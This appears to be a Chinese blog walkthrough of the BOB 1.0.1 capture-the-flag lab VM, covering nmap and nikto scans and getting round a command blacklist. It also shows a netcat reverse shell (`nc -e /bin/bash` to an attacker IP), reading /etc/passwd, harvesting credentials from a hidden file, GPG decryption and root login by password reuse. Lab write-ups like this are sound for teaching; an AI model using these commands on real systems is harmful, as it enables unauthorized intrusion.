BOB: 1.0.1

靶机下载地址
直接从ova文件导入到VM虚拟机中,启动即可。网卡模式选择为NAT模式

思路

  1. 找ip
  2. 找到该ip的系统
  3. 系统部署了哪些服务
  4. 该系统有没有漏洞
  5. 尝试渗透

使用nmap收集信息

  1. nmap --help 查看参数
    在这里插入图片描述

     -sP  使用ping扫描
     -PO和Pn 无ping扫描
     -p 指定端口扫描 1-65535
     -p- 全端口扫描
     -v 打印全过程
     -O 探测目标主机版本
     -sV 显示服务的详细版本
     -A 全面扫描  1000个常用端口
     -oN 将扫描结果保存为txt文本
     -oX 将扫描结果保存为xml格式
     -T1,-T2 一直到-T5 扫描的速度
    
  2. 扫描全网段ping扫描
    在这里插入图片描述

  3. 全面扫描
    在这里插入图片描述

    也可以写入到文本里
    在这里插入图片描述

  4. 只扫描80端口
    在这里插入图片描述

  5. 扫描并生成ljh.txt文本
    在这里插入图片描述

    生成的文件
    在这里插入图片描述
    在这里插入图片描述

利用信息进行测试

  1. 根据信息得到的界面
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

  2. 输入id,查看信息
    在这里插入图片描述

  3. 尝试ls,发现不行
    在这里插入图片描述

  4. 尝试其他命令进行尝试
    cat /etc/passwd
    失败
    在这里插入图片描述

  5. more /etc/passwd
    在这里插入图片描述
    所以应该是用的黑名单,所以more可以使用

敏感目录扫描

  1. 扫描敏感目录
    nikto -h IP
    在这里插入图片描述
    在这里插入图片描述
  2. 扫描到敏感目录
    dirb IP
    在这里插入图片描述

使用命令

  1. 查看命令的绝对路径
    在这里插入图片描述

  2. 绕过ls
    /usr/bin/ls
    在这里插入图片描述

    /bin/ls
    在这里插入图片描述

命令执行漏洞

  1. 工具 瑞士军刀
    nc -lvvp 8888(监听本机8888端口)
    在这里插入图片描述

    向kali 发送
    /bin/nc -e /bin/bash 10.9.21.68(kali的IP) 8888(Kali监听的端口)
    在这里插入图片描述

    已连接至目标主机
    在这里插入图片描述

    反弹shell
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

  2. 唤出终端的命令行
    python -c “import pty;pty.spawn(‘/bin/bash’)”
    在这里插入图片描述
    在这里插入图片描述

    普通用户
    uid为1000+
    在这里插入图片描述

  3. 进入到bob目录
    查看是否有隐藏文件
    在这里插入图片描述

    查看权限
    ls -la
    在这里插入图片描述

  4. 发现旧密码相关的文件
    .old_passwordfile.html
    在这里插入图片描述

  5. 查看该文件内容
    cat .old_passwordfile.html
    发现账号:
    jc :Qwerty
    在这里插入图片描述

    使用putty进行远程连接
    在这里插入图片描述

  6. 输入JC 的账号密码
    在这里插入图片描述

    查看哪些文件夹有需要的文件
    发现GPG加密的文件
    在这里插入图片描述

    发现一个脚本文件
    在这里插入图片描述

    查看bob该脚本的权限
    ls -la
    在这里插入图片描述

  7. 运行该脚本
    sh 文件名 或者 ./ 文件名
    在这里插入图片描述

    将信息复制到收集到的信息中:
    并推测GPG加密秘钥可能是藏头字母:HARPOCRATES
    在这里插入图片描述

    解密
    gpg --batch – passphrase 秘钥 -d 加密的文件
    在这里插入图片描述

    得到bob的密码
    在这里插入图片描述

    切换到bob
    在这里插入图片描述

    查看flag,发现依旧没有权限
    在这里插入图片描述

  8. bob是网站管理员,所以root是不是和Bob用户一样呢?
    进行尝试
    登陆成功
    在这里插入图片描述

    夺旗
    在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
该资源内项目源码是个人的课程设计、毕业设计,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! ## 项目备注 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。 3、如果基础还行,也可在此代码基础上进行修改,以实现其他功能,也可用于毕设、课设、作业等。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。 该资源内项目源码是个人的课程设计,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! ## 项目备注 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。 3、如果基础还行,也可在此代码基础上进行修改,以实现其他功能,也可用于毕设、课设、作业等。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值